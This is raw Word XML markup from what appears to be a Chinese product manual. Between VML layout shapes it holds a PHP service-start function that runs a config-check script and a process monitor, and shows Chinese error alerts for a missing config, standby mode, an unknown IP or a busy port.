            <v:rect id="_x0000_s9645" style="position:absolute;left:1617;top:7819;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9644" style="position:absolute;left:1797;top:7882;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9643" style="position:absolute;left:2713;top:7882;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9642" style="position:absolute;left:3195;top:7882;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9641" style="position:absolute;left:3315;top:7882;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9640" style="position:absolute" from="1614,7819" to="1614,8145" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9639" style="position:absolute" from="8364,7819" to="8364,8145" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9638" style="position:absolute;left:1617;top:8145;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9637" style="position:absolute;left:1797;top:8178;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9636" style="position:absolute;left:2713;top:8178;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9635" style="position:absolute;left:3629;top:8178;width:1446;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9634" style="position:absolute;left:5075;top:8178;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9633" style="position:absolute;left:5195;top:8178;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9632" style="position:absolute;left:5316;top:8178;width:2800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9631" style="position:absolute" from="1614,8145" to="1614,8471" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9630" style="position:absolute" from="8364,8145" to="8364,8471" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9629" style="position:absolute;left:1617;top:8471;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9628" style="position:absolute;left:1797;top:8504;width:1600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9627" style="position:absolute;left:3397;top:8504;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9626" style="position:absolute;left:3517;top:8504;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9625" style="position:absolute;left:3638;top:8504;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9624" style="position:absolute" from="1614,8471" to="1614,8797" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9623" style="position:absolute" from="8364,8471" to="8364,8797" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9622" style="position:absolute;left:1617;top:8797;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9621" style="position:absolute;left:1797;top:8860;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9620" style="position:absolute;left:2713;top:8860;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9619" style="position:absolute;left:3629;top:8860;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9618" style="position:absolute;left:4352;top:8860;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9617" style="position:absolute;left:4472;top:8860;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9616" style="position:absolute" from="1614,8797" to="1614,9123" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9615" style="position:absolute" from="8364,8797" to="8364,9123" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9614" style="position:absolute;left:1617;top:9123;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9613" style="position:absolute;left:1797;top:9186;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9612" style="position:absolute;left:2713;top:9186;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9611" style="position:absolute;left:3195;top:9186;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9610" style="position:absolute;left:3315;top:9186;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9609" style="position:absolute" from="1614,9123" to="1614,9449" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9608" style="position:absolute" from="8364,9123" to="8364,9449" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9607" style="position:absolute;left:1617;top:9449;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9606" style="position:absolute;left:1797;top:9482;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9605" style="position:absolute;left:2713;top:9482;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9604" style="position:absolute;left:3629;top:9482;width:1446;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9603" style="position:absolute" from="5100,9482" to="5100,9741" strokecolor="#f8f8f8" strokeweight="2.5pt"/>
            <v:rect id="_x0000_s9602" style="position:absolute;left:5125;top:9482;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9601" style="position:absolute;left:5245;top:9482;width:2200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9600" style="position:absolute;left:7445;top:9482;width:248;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9599" style="position:absolute;left:7693;top:9482;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9598" style="position:absolute;left:7813;top:9482;width:169;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9597" style="position:absolute;left:7982;top:9482;width:200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9596" style="position:absolute" from="1614,9449" to="1614,9775" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9595" style="position:absolute" from="8364,9449" to="8364,9775" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9594" style="position:absolute;left:1617;top:9775;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9593" style="position:absolute;left:1797;top:9808;width:1600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9592" style="position:absolute;left:3397;top:9808;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9591" style="position:absolute;left:3517;top:9808;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9590" style="position:absolute;left:3638;top:9808;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9589" style="position:absolute" from="1614,9775" to="1614,10101" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9588" style="position:absolute" from="8364,9775" to="8364,10101" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9587" style="position:absolute;left:1617;top:10101;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9586" style="position:absolute;left:1797;top:10164;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9585" style="position:absolute;left:2713;top:10164;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9584" style="position:absolute;left:3629;top:10164;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9583" style="position:absolute;left:4352;top:10164;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9582" style="position:absolute;left:4472;top:10164;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9581" style="position:absolute" from="1614,10101" to="1614,10427" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9580" style="position:absolute" from="8364,10101" to="8364,10427" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9579" style="position:absolute;left:1617;top:10427;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9578" style="position:absolute;left:1797;top:10490;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9577" style="position:absolute;left:2713;top:10490;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9576" style="position:absolute;left:3195;top:10490;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9575" style="position:absolute;left:3315;top:10490;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9574" style="position:absolute" from="1614,10427" to="1614,10753" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9573" style="position:absolute" from="8364,10427" to="8364,10753" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9572" style="position:absolute;left:1617;top:10753;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9571" style="position:absolute;left:1797;top:10786;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9570" style="position:absolute;left:2713;top:10786;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9569" style="position:absolute;left:3629;top:10786;width:1446;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9568" style="position:absolute;left:5075;top:10786;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9567" style="position:absolute;left:5195;top:10786;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9566" style="position:absolute;left:5316;top:10786;width:2800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9565" style="position:absolute" from="1614,10753" to="1614,11079" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9564" style="position:absolute" from="8364,10753" to="8364,11079" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9563" style="position:absolute;left:1617;top:11079;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9562" style="position:absolute;left:1797;top:11112;width:1600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9561" style="position:absolute;left:3397;top:11112;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9560" style="position:absolute;left:3517;top:11112;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9559" style="position:absolute;left:3638;top:11112;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9558" style="position:absolute" from="1614,11079" to="1614,11405" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9557" style="position:absolute" from="8364,11079" to="8364,11405" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9556" style="position:absolute;left:1617;top:11405;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9555" style="position:absolute;left:1797;top:11468;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9554" style="position:absolute;left:2713;top:11468;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9553" style="position:absolute;left:3629;top:11468;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9552" style="position:absolute;left:4352;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9551" style="position:absolute;left:4472;top:11468;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9550" style="position:absolute" from="1614,11405" to="1614,11731" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9549" style="position:absolute" from="8364,11405" to="8364,11731" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9548" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9547" style="position:absolute;left:1797;top:11794;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9546" style="position:absolute;left:2713;top:11794;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9545" style="position:absolute;left:3195;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9544" style="position:absolute;left:3315;top:11794;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9543" style="position:absolute" from="1614,11731" to="1614,12057" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9542" style="position:absolute" from="8364,11731" to="8364,12057" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9541" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9540" style="position:absolute;left:1797;top:12120;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9539" style="position:absolute" from="1614,12057" to="1614,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9538" style="position:absolute" from="8364,12057" to="8364,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9537" style="position:absolute;left:1617;top:12383;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9536" style="position:absolute;left:1797;top:12446;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9535" style="position:absolute;left:2713;top:12446;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9534" style="position:absolute;left:4038;top:12446;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9533" style="position:absolute;left:4159;top:12446;width:3615;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9532" style="position:absolute;left:7774;top:12446;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9531" style="position:absolute" from="1614,12383" to="1614,12709" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9530" style="position:absolute" from="8364,12383" to="8364,12709" strokecolor="#ccc" strokeweight=".24pt"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="234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9528" type="#_x0000_t202" style="width:337.5pt;height:563.3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3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start_service( $service_path )</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="183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097" w:right="3102"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>global</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $SSL_DIR; global $PMONITOR_DIR;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2014"/>
                    </w:tabs>
                    <w:spacing w:line="215" w:lineRule="exact"/>
                    <w:ind w:left="1097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/*</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>先检查</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-53"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>HRP</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-7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的配置文件，再运行</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-53"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>PMonitor</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>，错误</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="183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定义见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hrp-can-start.sh</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-7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脚本的注释</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-68"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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 xml:space="preserve"> "$SSL_DIR/bin/hrp-can-start.sh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097" w:right="281" w:hanging="915"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/kssl/HRP/cfg/$service_path 2&gt;&amp;1"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>, $results, $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ret )</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>; switch( $ret ) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2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0: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7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 xml:space="preserve"> "$PMONITOR_DIR/bin/PMonitor --run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50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>-f $SSL_DIR/cfg/".$service_path."</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/PMonitor.conf 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50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">/dev/null", </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>true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4"/>
                    <w:ind w:left="2014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true;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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1:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="2014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alert(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>配置文件不存在，不能启动服</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="183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务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>: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12"/>
                    <w:ind w:left="2014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false;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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2:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="183" w:right="228" w:firstLine="1831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alert(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>本机现在处于双机热备的待机状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态，不能启动服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>" );</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="2014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false;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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3:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65" w:line="280" w:lineRule="auto"/>
                    <w:ind w:left="183" w:right="171" w:firstLine="1831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alert(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-74"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r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使用了网络配置中不存在的</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-56"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>IP</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-74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地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址，不能启动服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>" );</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="75"/>
                    <w:ind w:left="2014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false;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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4:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="183" w:right="228" w:firstLine="1831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alert(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>监听的端口已经被其他程序所使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用，不能启动服务</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>" );</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="2014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false;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1097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5: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7" w:right="50"/>
                  </w:pPr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 xml:space="preserve"> "$SSL_DIR/bin/hrp-can-start.sh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footerReference w:type="default" r:id="rId53"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="90"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="229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9286" style="width:338pt;height:498.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6760,9970">
            <v:rect id="_x0000_s9527" style="position:absolute;left:8;top:3;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9526" style="position:absolute;left:188;top:35;width:3253;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9525" style="position:absolute" from="3468,35" to="3468,294" strokecolor="#f8f8f8" strokeweight="2.75pt"/>
            <v:rect id="_x0000_s9524" style="position:absolute;left:3496;top:35;width:723;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9523" style="position:absolute" from="4246,35" to="4246,294" strokecolor="#f8f8f8" strokeweight="2.75pt"/>
            <v:rect id="_x0000_s9522" style="position:absolute;left:4274;top:35;width:603;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9521" style="position:absolute" from="4904,35" to="4904,294" strokecolor="#f8f8f8" strokeweight="2.7pt"/>
            <v:rect id="_x0000_s9520" style="position:absolute;left:4931;top:35;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9519" style="position:absolute;left:5052;top:35;width:1400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9518" style="position:absolute;left:6452;top:35;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9517" style="position:absolute" from="5,3" to="5,328" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9516" style="position:absolute" from="6755,3" to="6755,328" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9515" style="position:absolute;left:8;top:328;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9514" style="position:absolute;left:188;top:362;width:1800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9513" style="position:absolute;left:1988;top:362;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
